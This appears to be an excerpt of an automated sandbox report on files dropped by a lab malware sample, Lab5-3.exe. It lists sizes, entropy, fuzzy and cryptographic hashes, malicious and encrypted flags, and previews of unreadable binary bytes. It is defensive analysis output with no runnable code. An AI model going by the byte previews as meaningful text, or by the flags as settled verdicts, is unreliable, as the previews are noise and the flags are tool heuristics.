                                                                                                          Preview:n..'."..$g..o.....f.{..<h...O..:.4.S<=FC..VM..f;.A...};...d.T9f...Z......U...7.g.>&n.S.. .j\.. ....|^....g..h3..Fc...,9E....,..U9.Z..==...@_U..l5.....Q..h.!~.P96..g....z..k[m D...N.d...V....C..'..>.I..{..c....;...<..G..-T......T.`......v`.....x.:.q.L..868..4I...a...M......},n6..Z..........+..%/...'....N..~vN..d.[e0?..pAW..l1..o....{f.=..............b';. .... ......H.H$!..# x.m.A7..^...d.....w.....i.6...*..-.7....%%..{-......>.....o.D.;.C..7H.PDw.....c.[..+.X......x.>..._....Oc.st....#X4CNf.....A.......s..J....t.5d....D5/'.....!...................}sl....ag..O.<.....<..........]...y...veDe...y.B5.p9.........o..Q{....SH.?.)m....I..=...$r..D.wNT.+{........R..*R..h..).jF...'.1[....@Xh.rZ8.?..8.hl*....`..&A`..B.oKl.S.O..9."a~...../X5.}.9."....~.rD5*=.$.......e.KwkwDO.I.F[...u!...h.=..Mp......K."8m....9P...oV...W.-.....=,.....U.._.su.........k...E._...R...w....8....m..-....j4..9..A.......,...+...@.'.`..a#.......!.|5.O/.......O.b...\
                                                                                                          Process:C:\Users\user\Desktop\Lab5-3.exe
                                                                                                          File Type:data
                                                                                                          Category:dropped
                                                                                                          Size (bytes):19744
                                                                                                          Entropy (8bit):7.990255450656833
                                                                                                          Encrypted:true
                                                                                                          SSDEEP:384:yj/UZwfn8Jz9jR19Z3M+5PeEMlmXp2TbXi83G2EiXSmsMsP6+7bRQSDtb:q/fkXb9Z8WKmCbnG0sMe7bRQSDZ
                                                                                                          MD5:203E9CEBC948E0DC1C113B2BC70CE2E2
                                                                                                          SHA1:1738D63A2E399E86E64463E6D915F74200FDFD7D
                                                                                                          SHA-256:6679C6B5193291036F22966A3BBB57EFD7DB9733E6C2D2CF2C5E3CF229161C4E
                                                                                                          SHA-512:E2225BC61E15FEA84BB4449CBE8EF9A1873D73427A3DA725EC61364718D42A9BBEF5808C8B6A0AD86E06DCE2145D8B11995FB7292A6F5B9E8500F3860F038D5C
                                                                                                          Malicious:true
                                                                                                          Preview:..v....^.]e.....(.R+.n.{...z....vWI`.;.Rj..0...U;........*.z.}8....|EQ/BeH..T.g..rd.G.L.+4.....1..Q..\..=...3.E...y.Zl.(4..K.3bL....a51..Gv...q.A\.S.nH"B...,.}..T..r...9.B.......I3[.z.}.;.K.W...:.A|.(../bR.....'$...............~pe..w.Pb....k!.K..>. ...ho....r.:.(m.#...F..........i.......nM.i....K..K.......*u....0M...w..2...^../v.}.H>...(8..=.8..a|...L.+#k.u..B.i....3..Z....h.6V..T...X..F`Q..-[&d..pJ.B.@........"L...J.^....<..Y."...B..^..W#.*..SU.DQxw.RP...\Z......|?t...A.U..".=d.2..m..7.=..@.Vw.=.K.q(F3.}...S>TWM.p"....X.......{..P..@.t.w..../.....T...&^H!.]i.....L.l...J.&.X.|.`xlG.|.....v-......Dm.+....N.T..HZ..DRS.u.Cd./..g2YtBmbQ.X..Ui...g.l.. 4@WN..]O...)<...".d..........r..PS`...)...g...M}...HA1r..6...r...I2..+....M ....w..Ce$0.;........(e<......4...B.w...).Mk%...".....U.....7........8..V..G.Q:J.....[..5....Q..F.J......F.v I.S.r?V>Hyd.[..H...j..`=h..P.;...+...Z.!......t3..SbJ1.v.-...P......x.._...Y...s.......$%......WC.F.6.
                                                                                                          Process:C:\Users\user\Desktop\Lab5-3.exe
                                                                                                          File Type:data
                                                                                                          Category:dropped
                                                                                                          Size (bytes):12624
                                                                                                          Entropy (8bit):7.984087859808104
                                                                                                          Encrypted:false
                                                                                                          SSDEEP:384:zmRaAcQluJHbaeyGr5qKz4X9E7bkurFrEcnHeqtb:qROQ8ny5xX67bku5rEaHeqZ
                                                                                                          MD5:C05E71146182A88D31F50B1C6BE0E8F9
                                                                                                          SHA1:3D74199BE2C764AE366DE36E000C30311CD9AFCE
                                                                                                          SHA-256:1B3210DD2CF6AC0FBAD0ECAA52DB17554A28A28FE6365EAD1282FEE27288235C
                                                                                                          SHA-512:56B110CF323B6478EFD3CDCAE705BEDA15199C9EF625644EE31E36033E94C6F1B1776F8F058114C42A4C38FAC51CBF3C65F3DB9E7B080FCD9B962A719BCF7D65
                                                                                                          Malicious:false
                                                                                                          Preview:4.......LgR..P.......&.;..IL.sf...^f..*.8E.^e.C*...YeS...Sa..Z\..<d...zN-.=... ....2.).0..:7....S.rl...Y.b5...k.&.. Ws.4^v..X.W9.5.).h}..n.OS...9..q...3..I..-..=?...y........A.km.-q..`.8..q..DWK.^.#.}..*..U......&..yp..c..j..,o).....x3 S..8....]=...j(b9.[..a._P...d&..T.;.AjJ.....H...A$........./G.U}/f...p7.@tVOI..I..zu....yjd.XQ..`..V.RS.../...q.?.Ik_r1..2S.....S0..b.:.....F~.a.....@or..C.U;/^.l$.i..}...t..h..N...kYi.......D..4{...[AG=%w.p.......&..s......p....L.L...@v..i=....qb.X..Rx.<c.Hc..'i..X3...).Fc.^V....!....;iK....0.W.r..+.5.fJ<..\..).[....N.WH.3 .pK.....0..|..O..>..).%"...gUuF..xh...r.f.c\.F.1..n8.Q.^g1...7.H....#.Q... .Q....[_.r.......H..t....Q..\.O....aE.ksC.R..+;a...>...#B..S... ,R.8.-..*.X.8..V...}.l}..gW....2...mn..."...(.N.......{......@.5tJ/.n.=Z.u.KH..D.H..Z../....;h/......+...1-.Sl_...v....7s....W....;.rVK..D.K..q9...N.%v.(bX~.......U....j.&.EQx...e./..c......|G..J.R6z.+..A*.....m>#I......../....XE..<#vD....]......-.A..V
                                                                                                          Process:C:\Users\user\Desktop\Lab5-3.exe
                                                                                                          File Type:data
                                                                                                          Category:dropped
                                                                                                          Size (bytes):1904
                                                                                                          Entropy (8bit):7.9008150687019825
                                                                                                          Encrypted:false
                                                                                                          SSDEEP:48:4hBUO8htp8HfUTid3hBaUoSGFcmeykEdEElU92i:40Bhtp7Gx0uKeY2ElUJ
                                                                                                          MD5:7EE87A7E58B3E54968F53D6B2024D1A4
                                                                                                          SHA1:A2B79A651FA3E05A8EF939C320C3474ABAE8DBD2
                                                                                                          SHA-256:66520E35F2839C9F0C93224B0C6FB0275039AC766E7FF68B802E5C186D536085
                                                                                                          SHA-512:6BFF9782204803ACE5DB769ED6405B467FC4DD0EA48D2B2E8B03C9CE100724F7428489A9987976FD6761CCBF231123C376D03C7A2E8E0ACD679BACE557FF190C
                                                                                                          Malicious:false
                                                                                                          Preview:..#.K[..$.a.B.......i.Ui.....3..........V...e.....\.A..r......>J.......;.~......?.~..u..n..H.u.P....f..d.A/...+%....f.P4sAk.xlBgd?.p....s.\.e.q9........9..)..s,.7^b.....*.NR.bB.B.[.."..;.UR)zyp=..n...X.G.$...+._c...Q%2..h'.~..?..N.. .N.P....{.2XU.......dk.z.@S)..FvX.r.8.^..Z..!*..3B......F0.....S... ..%&0......[...o-.?k..z.....7U..h7...>Ah...~.3NE...b>..m.j...@.....C..........P.l.....ml....2eq.0D..Z.....W.J...{.9y..{b..os...cG40J....S..a.,b.e..ouR.............D.U..Hl.n...+.mq7,...F......YK.......6...3..FJ|~..t..=L.3..kj.....H"...}q-..?.z....3_..s.B.0m.!.F.g.B.s..!....a........^.Q...rp....;....M....R...=(..(ch.s:........Q.V6g..>L.D.j.V.....;.$....h<P.p.....z.,r..8^P../.Hx.F...04.Ov.0&>.5P...t.,......y.....5..y3./eT..1...g....LQ.D.%Jn{...&.}...m.Y]da..........u.....r.D........<.F...`iY.+k...P..k.-.*.....67.I.,g.._Uk.h..Z........app.......B|.9.....&..H~..T.6..?....[.~....O_2....,..H0B.Y;..6..6.z"...E.;...Q.,./..........5..O.^.]..f3!...}...{..
                                                                                                          Process:C:\Users\user\Desktop\Lab5-3.exe
                                                                                                          File Type:data
                                                                                                          Category:dropped
                                                                                                          Size (bytes):9200
                                                                                                          Entropy (8bit):7.980781503390158
                                                                                                          Encrypted:false
                                                                                                          SSDEEP:192:9fKHNtOsUVWLOOYq7H+Raxn0DEXAG3o86M7530Cb:R4tgLiH+MxnC43tb
                                                                                                          MD5:A144C58C691DF11D4E64479E4E0EB9FF
                                                                                                          SHA1:C525A18CF3098F87791BCADD64EB5DF32ECFA364
                                                                                                          SHA-256:66D78FD906B5A275F824715C9FD5D71EB4BA3835BDB04928D62B60F00B94C0AD
                                                                                                          SHA-512:4799D17CFB3469CC69283E9DEA3BD6209557AABC55DC4DC964D0FF4C01157C76B866D5F879C2D365D1E9CDB0F5A0E97748EE8E69C3C5375E0465DC11F15782D4
                                                                                                          Malicious:false
                                                                                                          Preview:p.8F....../.'.;."../.f.G}(.%.NZ..M.T(@u.Sr../.S.......2.X....(...@M....\.W>k....w=..g>....C...2....d.A.h..U....9.e.7...q...P.+..v..d...mE.H.b..T.,.X....7.,w.<..i.p....\c.3U.A0.c.0....(/.a..g.<..Z.E!...p.b.l^.2..[.Z...ie.Z..S%?....=...f:e......N.....w..s...z..X...GRB6...e.-.bM5....1./.L...FZ.M..9.]*.<.l}.rH.i.s.....~..#.........8...l.aBe@$B.../.....@.[y..l.=..[.}]..Y`.....)....}..O.{,...!.p....<.(.C-A.n...J..,...Q.G..|.:........>..G..F....*........#1..R....IWwo.J .]..)u~G.'...M.....;.!.MI...ky.....a.w..7.W.#....S...g.k...0...... 9....2...x....j....39..x...'.W...s...!%..zU+.k.IK........#.\w...m..(,.@.OC.7..|u6+V.N>...N\."e......d}.;.P..YP.^d..........7.^[Yj.....&.6..n..v..,.rJ.~ky..0.E..s.......[b...U_O.b....W..-.#...2a8....L.b.]..&........2.:..T.~_*..< .2!j=.J.~..(.=..7...6....!Ho...".. .{.I.........-7......qH7.l.X.[..gz.4.U.g.I..a.I..'X...=}<..I..5h.~..Et...e.....O............x.1....:..>....@.Pr.....$.j.-.$.z..dE.b..vxdQ..^.>....
                                                                                                          Process:C:\Users\user\Desktop\Lab5-3.exe
                                                                                                          File Type:data
                                                                                                          Category:dropped
                                                                                                          Size (bytes):12592
                                                                                                          Entropy (8bit):7.9857612753463645
                                                                                                          Encrypted:false
                                                                                                          SSDEEP:192:o+qzUd01zPEObRpewixHBb1A7Rx8xz+mANjGcf50qu7IWZ6Fz1Kx1CB20Cb:o+qzU6rEHwYZIRyxYjLfBuM0i1g1Cwtb
                                                                                                          MD5:D8A0A942D89003A6C30C24B63440AF93
                                                                                                          SHA1:48A2F96DE4DF1C4E5879FD17FA6E455434774A79
                                                                                                          SHA-256:9D1FC3A0A2C7D97102BC9D153976B14AE06D5FCB240B9A5C123F6F8111F8A4A6
                                                                                                          SHA-512:5F31A1CD7A554AF44584E3750775A0908BA9BEDB8C2431E8B095D04B33F8D494BC22C94E209C2B7E269D305303783942DB1F764E390FE4ACED36769E97D4973F
                                                                                                          Malicious:false
                                                                                                          Preview:..5!.....a`rL*...4.Z............%Y.m.r:I..)...8.F.....B!.O..J9e.7+p.t*\.G...\w..N..c|..I~D....8R..@..."..?.59A......T..z......k..|.T..Z.Q.ql....5?.A.G...Ed..;.w.+..e...?0.....G.....'../.....].(.x .9..;.s..../..*h.p&.Xf..e.../.cQwC......\..H.%...g.]ys\.U...U....?.3....P"...P.fI.O.-..m..(.smU@D.h.o .sA...G......n......mb.=...3..........$.G...{8+(.....8.(b.j..)...^.:x+o..3....26.k./.I"X"..Z......0.....2.@...F0...X..6...Y....T..W....B..|......r.f.sg#I3...)zp.v...V...Vk:..4s']...u....L.....+.9.eO..M.......W.9:..}.....U."YR..\.8...(.e.+.Jo#a..s..z].!1.....]..]C....:...._.H....G%..G.~.K.?....9y<..A..V...I...}L2v4.#...e.y&...rj.n.~..ST.4T8....|..@.c..;4...zP.wI..%...J3.B.D.......`..$_PA0...ePb........GS%Y3 .5..i...3.Q~."Rf...e.d...i.K.....\.....jT.;v......*;...B..!.tp.a.I..@...v...C...,1......FcwWUq...u.pW.5`.>-!..Z-..m..("&{'4.gtS.._.....u.n<....<u>s.d.*T..2..6..m.e.}}*.(..L...fH........../Wn.-.$.c1..=...MM..Q... w.D........W...R..?...#N.
                                                                                                          Process:C:\Users\user\Desktop\Lab5-3.exe
                                                                                                          File Type:data
                                                                                                          Category:dropped
                                                                                                          Size (bytes):73056
                                                                                                          Entropy (8bit):7.997828778867717
                                                                                                          Encrypted:true
                                                                                                          SSDEEP:1536:9HGHq8z2leF2rvFwsCDg6ZRIAo6Ml/ddXowkxzgzCyPGOZ:wSle4zpBIOAPgdXGSGOZ
                                                                                                          MD5:1A07971F56ED3C2E7FB2C9C165239974
                                                                                                          SHA1:70B3DC3C89B7989586FF2A7C783667CCBC0428BB
                                                                                                          SHA-256:0665B600D2925A62334D669839A6ECEB2AA26C5DEC3ED36FE0B25A3B23A6E553
                                                                                                          SHA-512:6814D11CAF436C605E5170B08BCD9BBE34EAA17EB63EC97B258D35A1513CE25E73E3893C1F80A08A1D442AFBFDC460FAFC43574A56EF61ACF421809562234541
                                                                                                          Malicious:true
                                                                                                          Preview:........G.'.{.G)M..'..GC.]{p..B.g......F[>......'0.p...$/....w8...l;1l.a..R.B$......})...x...g^......&D..>o.aM.P..Z..Lq......Vt..S.K.h.i...........[..!..LwF.....p..C..Af."....l....<....P.....|jN.R5...>B..4~..i.~rN*...9..<k.8.TFW7...F..o.\...8.k*...(yq.C.F$...p..=.L(.mE#y.... ..f.;.P./.4d.{u{w.............$nz.........)..2.oefa.S:)S.7.,5.3..))K.....f...........}.V.SGA.+.#..............].)R.....b...;.AA.........~....w...</.....3...f.....z.f9.R.....p......p..@...."..0. ...j....t.|....IYr.@5...@.@u.&.L.\..z&.....!.Y..JTC..8k...k.xh.!$..Un...E0K.k2..t0....k.w...3{..9.*1.'.....n..Z}c.E..*...>.+D..+<..R.~.o?.P.O...O.`k....I.]J.....*........>8..G..~.c,!.....6.....T]..."1..+...pJ.7y..q..A..u.#.........BB.....}.'..J.@....-0.EG...X...Q......c....o:......U.v...[K..9z.F.x.>....6J.D6.6p.... .IH..z.F\..a....)....!N.....m.D-1x.......V*...Z.}F..".K.P$...P..?T.......g...}.........HI..#.D0...5#...tD...&.e..Uy..........c4T..E2......I...R..I...R..<z
                                                                                                          Process:C:\Users\user\Desktop\Lab5-3.exe
                                                                                                          File Type:data
                                                                                                          Category:dropped
                                                                                                          Size (bytes):15824
                                                                                                          Entropy (8bit):7.9884130643213
                                                                                                          Encrypted:false
                                                                                                          SSDEEP:384:W5PADAaglTD0FqPxwFG0oCx9RyvehbsW8bVFvB5E8ZRB4gtb:WRVj0UPKrbROehNwjp+ARB4gZ
                                                                                                          MD5:8693D6F1FAF1EFDB77385FBBCBEFF5B9
                                                                                                          SHA1:ECF64C36D21657766DFB9BE9978C625A6375BB22
                                                                                                          SHA-256:B299F6DA5F8FAC0486A5154AFE8F481C019FD258225C97B1EACE61BF3D8BBDFA
                                                                                                          SHA-512:90B06916573196BD1779722FB45C9981384196FB379E9C81C1A78FF73FE68E8E688D70A208738117562C7110CA8E93E4BFDA59E837A65CE35613FB6CFF3ED2C8
                                                                                                          Malicious:false
                                                                                                          Preview:..0c6.=f-.u~F.}|..R_p:$...]>.!;;on..j.E.<..($k....-...q..>X...o..#...@=5.~...$=G..^-....3v..O..B.h9]cK....d....Q.I....u?...Od..oel....bU)%"..(....mn.E.........|...I...w`.....XS7...,..-.......?'.m.w..S$...Z.w1.wh..v..a.D1c.{VG.....k^....J.c#lQ...BDQ.zl-.$L3.$m.W`m.AE\}.}3.'K.....2u.2.o0)..t..~y.......+...?......1..}.'..p.O...cq....l=.>.N......Z..e.9......-1....\....V~M...|.+.-.-UB]..+...^.....i..TZ...ju....._.i.+.AI.4s,ng.4...-Gl..a.._B.2..v....F.P.....Vl.O3..xB0.h...*<n..C...|n..K...a..?..../7...q~........dx...u...T}$.>.,..4..j...h...E..T,<.4w9.k.....?......Hh^..xi..........1...'.p.d7.....#W...\Z!..AK......D..........B..Ka.d.h.I..FmQ........2...... L..+....;...e ...G.X.l.....1.....4..6.~!v- .2;....;a....0...........R.H#Ei..8......Z2.....t...HN@j.\..n.<..`.R...<.Y.. -......6o0F..x....H..iK.:.z...$...6...p..:2.,h.].."^.p.*^q?6.........:z.....R.*j.c..Kh..r........}....!.....KG..2.kA...;.r..nWe;..R3.g......U.....;..[..|.....CR<.(..Bg......H.-.+...
                                                                                                          Process:C:\Users\user\Desktop\Lab5-3.exe
                                                                                                          File Type:data
                                                                                                          Category:dropped
                                                                                                          Size (bytes):12640
                                                                                                          Entropy (8bit):7.985453963464884
                                                                                                          Encrypted:false
                                                                                                          SSDEEP:192:erYjLoKANXqM1Bv+bzQTPWDcFZr4jJOg5xe1g9Rv6iUyOl9Up+pAUoFe0Cb:0YhANF1BWbEScZrceGD6isl2+eNYtb
                                                                                                          MD5:5FAF2C75B7BDC970A05EB53713035A6C
                                                                                                          SHA1:970FC646187EBA2CE6055F1389524C7A71811123
                                                                                                          SHA-256:4C9C69D6A421ABEE6DE48109559A29DC249643A829D088DD261A2A90F81E2932
                                                                                                          SHA-512:FAA16B2813277CEA34F3D1492FAA701F8D1FC9279E63B60149ADB62E1891B40E1AF7811A92F083B5FFFF7505E74096C8E6696E7B110635521ED5B71B5C91EFA1
                                                                                                          Malicious:false
                                                                                                          Preview:A..........D.Tp..C....pM..X.;.wHc.9'>.>.u........I.I..1.o%...Z.O..'.fy./yf.......}.Ft......\.~_z.,. ..=.X..]...L.N.S.9<...2..'.6f..*.W).=A.m.IR....F...o<..g.tX...z ....V.#R....J.....e........+.0.........."..o./z.Q,...w.......y....9~.'a..s...)_FX.>...ZC.)..'.a..p..h8I.A...k.c....]...J<I..nIMrM.,.Q.U........Ji./........j.....&qR7..$.[.&...;..Y.....6.0].#Bxu.{.9..(c.w5...$....x..i.A=.e....;.>.....O.-.......I.;b...f.V...9....2on.......9.T.yZ......M....g.3r..?.m.<...G..r<..v......=o..9...[#...N...c...F.....-..0yz......*Zb.....)?..>.\..p.Lk....h..//.p..!*j.....;.%;....t....8...5{.....`....rK....V..ZPm..V...\ZMv...t.f..)1N.>....[.~.0..<...j......u** .L..3......2..0e...uZ.c S..%.....]....+F...0.SB...c..@.].G.....nt40.].2.....l..z..y9.v....Mj...!.....X..a_.O.px.I...v.S{. ..zE...l..5.......;....D.......v..D.4..r<..k.=.O....Y..>YTc...$3_.V.8...c.^E..,9`...s..G.....pM.mL.6....c,./...=......?n......EV..$`..+.*OuJ..N..[4..}Q..4..|`h.v~w..#...\
                                                                                                          Process:C:\Users\user\Desktop\Lab5-3.exe
                                                                                                          File Type:data
                                                                                                          Category:dropped
                                                                                                          Size (bytes):2192
                                                                                                          Entropy (8bit):7.9117966463018545
                                                                                                          Encrypted:false
                                                                                                          SSDEEP:48:FeJnBY/cymXKg3tHfUTid3hBaUoSGFcmeykEdEElU92i:FOneC6g2Gx0uKeY2ElUJ
                                                                                                          MD5:EEDA17500F5E4CD4E07D3793222DCB46
                                                                                                          SHA1:EF4445B7C44F30D947F592166B1B9F45BF8B9C4D
                                                                                                          SHA-256:F2EDD5E6F42EFE96B26A1703E2748E08577528EAD9B39A6FADA9CB029276D864
                                                                                                          SHA-512:8DF5C43D6698A5FF5B9CA4D8C632D3B666106F8645A608AFA1AFF2EA57615FF41DD41E31081A381910545CB6E20C11AA1415353A350697B192DB794FE5D362F4
                                                                                                          Malicious:false
                                                                                                          Preview:.....2..m.n.G;...I..P!......7..#.e:...PY<.D......[6..e.....U..z.oZ/.}.....t.=Z@hN..J......PS.YNN-..&."..{>m/.'*.<C/.Q}d.x... ..~pa<.`SGF......,O.a.p.]$.X\.......d23....i...u<'Z[........%.R]..........fm.K#G..-....~.bu..|. ....iG-*....r...L.vho.En...gc;3#u.T2..XT.d+.=R....0#.2a....).....l..H..[#...ycacD.#..2M....h._.(t..LDGP...0...,.!'.G.6..5.f.."...x..Z4X.N............9....+.....4..!c.x.....0...Y.."...'.............4.2...1...7...K.S........q.%j.4..FZ....Cg.t.o.....0.......V.,@&."".....`:l2.C..u".,r.Z..w..\........Y.R....ckB8.... .....nve )8.@`..4S..... `>.]8oq..!...Z......2....R.!..u..-.HI...K.=..\;w...o.0.......p.>..U..e ..........:.B.-..z.<..%..;o..2kB......v.W.{....I...{..*...?.w%*......C.p`.L.i........N....j...;..=....Sp...bJ..s.0.Q@4...+.....>..Pa..y...O.|P'./.q.0.I*....=8...%.@|..v.4!59...n[.f...PL.W.Zq.......7.t..!...R.C$^Y...u|...^.Q...rp....;....M....R...=(..(ch.s:........Q.V6g..>L.D.j.V.....;.$....h<P.p.....z.,r..8^P../.H
                                                                                                          Process:C:\Users\user\Desktop\Lab5-3.exe
                                                                                                          File Type:data
                                                                                                          Category:dropped
                                                                                                          Size (bytes):4240
                                                                                                          Entropy (8bit):7.955087824172209
                                                                                                          Encrypted:false
                                                                                                          SSDEEP:96:vaAOm4DwQVMNvwnztG0kvJzJ0S0Gdq17Gx0uKeY2ElUJ:Sd09YztG0Ij0GdV0Cb
                                                                                                          MD5:2E28190A447C9FC9F0D762CDA9748436
                                                                                                          SHA1:A2BBD7EE66641D1228BADA1474462A0660DC30BF
                                                                                                          SHA-256:0C14EF9F3C4B8D7E28FF6420B0CB1275B60E0DCCD109F24DDFD3B14027D162EC
                                                                                                          SHA-512:6DF61A63F230760D982CBFE92B69D4D3AF48BC8449E028FDF57EB4AF7D60EEF54D110774ADA24F3FAB6DF0A5E85CD65D22EB7341F415890C38E9CB522E9CD349
                                                                                                          Malicious:false
                                                                                                          Preview:..\....n.....p..@....9.`..?K%`.p..bM.]..B..?...!..&....{3..U..N...........>.'~....uz*4..,.I....W.&.g..Ba....FWOi....{b....)..Vk.z...4o.|s..qf6g.B....B\.IV..!.C-#..>cnp.\...O..wQQ..@..T.N.$.H.....U....X....oH..^."..-.Q..:.|[.....38Q.=@.t........g...0........"..$..._.4.;|.....|...ZM...".(.....)EL.u.v.._G...d......=.W.+D........Vq..vW.X...a.{.f,.k.. ...G..f.\....{.4....$.,,o.....O.2i....?T.'$......Qc.+I?@({.!,l..Q..p...F..?b.n..!......n.QU/..M....~...dR"+.f...9.PcM..S/....?>...\%..Ah....uN~..i...f.....I...........r.........k.0QP.M.E+.......nt..r.[...e.....@..]`...g.&....Y+..&U. .Fo2A..g.....u....M...HM.o...!m.3.2....X..)......=..Vz~1...d-...?.^......f!z[9..i....Cd......L..O.l.e.Z..SOWzi...(zB-._..G...P...\?.9..t.. d.tg.P8..].1._...u^2.^..J>..~.+k,..-...l....X.-eB....0.H|Z..@..$..(..i....sy.=....F....UH^.....c3.j..*\.6.....}...... X...... }.2[....Z......_5...$k...d.:..h.;..n.....j..y....:."..@#.m."U.K&.:.`0.........Ar..(O".......NX
                                                                                                          Process:C:\Users\user\Desktop\Lab5-3.exe
                                                                                                          File Type:data
                                                                                                          Category:dropped
                                                                                                          Size (bytes):11872
                                                                                                          Entropy (8bit):7.985210529054922
                                                                                                          Encrypted:false
                                                                                                          SSDEEP:192:/VuXUXATG2A+IZLRfRFebOosRh4sckJnlwjm0o+DHO+wrNPo3JHgm0Cb:tuX+XRfRFEOoeh4sckrwK0bu+KPeGmtb
                                                                                                          MD5:51DAED7CEEA5E748D77E0E6D28A31101
                                                                                                          SHA1:58AC8B28F1C54C92453223C7A6E7F554D3381523
                                                                                                          SHA-256:FE83C74BD769870349149E41305A18723F0CDFD13081F1AE1FF630719F2A8B2B
                                                                                                          SHA-512:E0EFE48EEA21C0E2DED7FEABC517A03A788B9E2AA210AA5183ABE814B59CA58E29C9056783BFAE5BD926E85C85DBF5C13E19BE842C4C97CDB6B7820790F75123
                                                                                                          Malicious:false
                                                                                                          Preview:P:...x..].Y3..m...?..uH.Y0m..@]\.v45.Wfe....z..t,..XA,..bCIX..w*.n.?\..EwIP:.:..$)+1..=q.d.p.5..o...........1..k.C.?kY....a^9....).F...>.a.V<..j.rM..*$|S..&..%..\.g....J....A.2..Va./.....v6.O/3....^8w.bD..K".`...B......`~.N.eBU.#uw....d..F...F.Y.z.A..Q.m~..')!.....#.C.Df..[../*.1.B...:.x.3..N$...*.'...../XY..r..W.E.....=$...u.j.!.M..6. ...n....L.(.........Hy.VVZ5&..}..~\...4O?...F..zY$IlH.y.1....0YN..,..i.Q:-".V.A....t.i...}....eW..^......./....SI.B....f....hA..........N...;zE..V1I).D|8.J......i....r.X..cR...^...9.{8.-X...OUh.....G..`p>...E......8.l%#..b$.... .Il..<%.J.?a..mT.)aa.%.$.y.P.H..:..........d....>D......m.{.,_h_......L0S*]s.#..S........"~3.z..J.-.e.x.J.s.;..y....i.L.F.o..kF....Sq.........'[!...%g...-.....W!s...y@..A8....z.....?.....l.....s..*.w.x....n..m...g..j..._.8VH(.;.{.5d...1Q!*......4....L.^l*jL.....z..[.'I.......&r+.%.?t.p.h..j.5.Iw.+..x;.4.9..W.......sh.Q.b...6..+.J.`n.,'..@).cz..Z.............L..n_RY<XZ...0(.6UnrjM.9
                                                                                                          Process:C:\Users\user\Desktop\Lab5-3.exe
                                                                                                          File Type:data
                                                                                                          Category:dropped
                                                                                                          Size (bytes):34288
                                                                                                          Entropy (8bit):7.994294171762715
                                                                                                          Encrypted:true
                                                                                                          SSDEEP:768:On+ghn9pi0Il5Ink4TRy79KXg7UVc1/0sJNXZ:k+guzuokXgAGZ
                                                                                                          MD5:4860EF0894C5AB9BCF16221E866796C3
                                                                                                          SHA1:6AD6887F12A9FCC2952CA2CDBF422C877D8D71C4
                                                                                                          SHA-256:AF8472391FA557F6B8476E7986E1D848EFAE9695ECDED4C3993598AF228AF506
                                                                                                          SHA-512:4E9150FE244C082139652F8A0401443EB903EBBF18CB89F864C87F919DC68194CA09EF850579108825E576792CC32945104739CD7610F10B55358BF991C472D8
                                                                                                          Malicious:true
                                                                                                          Preview:..D...Dz=s7.h/...o..w......d.@$A?.....3I..hSP....n..@+&....<.p,..<5.B..3r0.".:D...[.. ...Q.LO.ci.n.?p....?t!.....o...j.]..S@NS..n...;...7..e...J.....X!y9IyCf.K.x\&..*..`.wbo@.%..G..+$.n$..Ecy..j..%..h.....7...4....k.......bFqk..[.V..)..C. =^l..W}...i..p.y}.q.t..l....w..o..\.Y).7id-.1..*..y...O:F.4....9-V.JI..uP....>=....oq.W95..h;.F ...f.... S#.ah!...P..:.r......c....i.`[.....N.X.'.x[K.n.B..iDz.<?H...D.[Z....K..D.[.`.\[E.H..2....gfZm.....uc.]..sC>......8. M..R.Z..<<..)...w.0.I`..ac..N.......m.2..R..Y. ..Z..Z........>y........`.%..!...0....*./....w.....w.U..n..F..R......Vc.LO..3..R........&.N.).<..@Y.....1U(...&.Kb..7UO...2.9h.k..R..]\.....J4oB....*=....?I../..`.!_!2.=..`Up.n..L......]*>.*X.N..5-.Y.Ub<.n.<....=v.Z.V."..~......p..8...[........0|..P.n...3.e...x.Uj......V.......d....y..C....).pv...&..&.".......B.....G#2E2 .k.N....S. 40..Gi"...L...b.r..R.<........T.9..w\..o1......c3.~.65...[...cC*.....X}.".2..u..G...1!t..k.Aq.$.}\N*.{...|J.
                                                                                                          Process:C:\Users\user\Desktop\Lab5-3.exe
                                                                                                          File Type:data
                                                                                                          Category:dropped
                                                                                                          Size (bytes):17424
                                                                                                          Entropy (8bit):7.9896442715224545
                                                                                                          Encrypted:false
                                                                                                          SSDEEP:384:6RpLsE9U/k8s6GUNEIRgRY8LlxnjUQFNYMp1C77jNtb:O5sE9A0/DRVxhI/tZZ
                                                                                                          MD5:26A61E941D8419DF744F0C27BC0F63A7
                                                                                                          SHA1:60144078AB8B9950AAA8DAA79E7D841940009314
                                                                                                          SHA-256:62856907FB9C151EDA83BA8B7C73B55DE8C1E31A2C523F1E463767453C0FD8F7
                                                                                                          SHA-512:51D59435E945197BB9FAA4E65BC5E11C1EFFDC9697C3FED3A90E78F9B0154B6C28BB2DEBBB89A0594F118AE13A24BF50F8992317E97ADBEC70E9D3206189FC4A
                                                                                                          Malicious:false
                                                                                                          Preview:.DJ.........>.A..@(>.1s...-.+\...X....N..4...[.. ..@."..q.,I?.....$.&.U..G......#..f...^..._Tj..+qr..q.LR0n.9....q5.....U5X..h..d.....00NjY.....o.*a..+..)..^c.R9U..7........(|.M...m<}..._.l.../...S..`.&...wM.W.P.)p....BO@..>...6.........$./[...7..z..N.P.....b.(.m.....@.&o.C..1..h<....3..t:......Y.5).^..Y..K....6.o.Ox.q...ucB.q:.|}.:..^.u.NA.<.,.Y.9J5...Z....5.D..o.u.A.I.`&..F...[.`..z`.4.u.;....@..../....6..N.o..I.Y...}.....`......sAM.E#.p.........&.*U...-.H...2J+/../..Q..7)..{X......$.'..-6...Z-..L?sI0t...l...m6...=.....*..y.r?..2.=>. i<."n...34.V..`T.......eu."8.9.s..WC..R.b..nNX...'...Lp...G.Q,|.3.IpIY........^......{......LfW...>$sg...Y.W.,..1.N.q.i..?Q......(...Z@......:W..<... ?.xa~l\..]o..M..S>.zu....}.a.u.e......I..t"..MN..S..d.._Iw0.|..0G.6%..I..z..'./1....>..{....9..=.,.|.;..C^....h.ZAf...y.....|..O./B...0..#R...#?..y..+./.7.gyM6.6./f...L.wg....S.t.A@.]L._...F.....r.xG.pJ.P.....u.5"..O?...H.{.Q..j.F...e...f..'..a.."+...iT......
                                                                                                          Process:C:\Users\user\Desktop\Lab5-3.exe
                                                                                                          File Type:data
                                                                                                          Category:dropped
                                                                                                          Size (bytes):3520
                                                                                                          Entropy (8bit):7.947099267150025
                                                                                                          Encrypted:false
                                                                                                          SSDEEP:96:n2Hxp4q6booLYCYKjyzVMWqTAGx0uKeY2ElUJ:n2Rp4GqvjyzCWq30Cb
                                                                                                          MD5:64F63E2C689CF7FB5966CD283F0EFEBD
                                                                                                          SHA1:57A11B4E6674723E8B6C59B7A0B953E9E53D69A7
